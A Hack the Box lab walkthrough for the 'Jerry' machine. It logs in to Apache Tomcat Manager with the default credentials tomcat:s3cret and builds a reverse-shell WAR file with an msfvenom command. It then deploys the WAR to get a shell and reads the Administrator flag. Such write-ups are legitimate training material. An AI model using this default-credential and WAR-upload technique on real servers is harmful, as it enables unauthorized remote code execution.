This is the Hack the Box Jerry walkthrough. I cover how to root Jerry without using Metasploit. If you are looking for other hack the box tutorials give Active a shot.
What You Will Learn:
- Apache Tomcat Manager Exploitation
- Uploading offensive WAR files
- Windows enumeration
Here’s What You Need
- Active VIP Hack the Box Subscription
- Kali Linux Virtual Machine
Initial Enumeration – Recon
An nmap scan only reveals one open port on the target. AutoRecon confirms this as well.
The landing page of the Apache Tomcat server shows up and click on Manager App to open Manager! This leads to a login form to appear. A nikto scan on the server actually finds the credentials in a rare twist of events.
Some Googling for default Tomcat Manager credentials leads to the username and password combo of tomcat:s3cret which turns out is indeed the right one!
After logging in using the default credentials we are now faced with the Tomcat Web Application Manager.
There is a place on the bottom of the page to upload a new WAR file. But first to generate a WAR file with shellcode in it for a reverse shell connection. For this I am using jsp_shell_reverse_tcp instead of going with a Metasploit payload.
The reason I am using it is because it is a nonstaged payload meaning one phase that can be caught by using a netcat listener.
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > shell.warNow to call the shell by either going to 10.10.10.95:8080/myshell or by clicking on the myshell link in the lefthand column.
The flag is in a commonly placed location for flags which is the Desktop of the Administrator account. In order to list the contents of the flag, a text file, you have to use the type command followed by the filename in quotes.
There it is the final flag and that wraps up the Hack the Box Jerry walkthrough!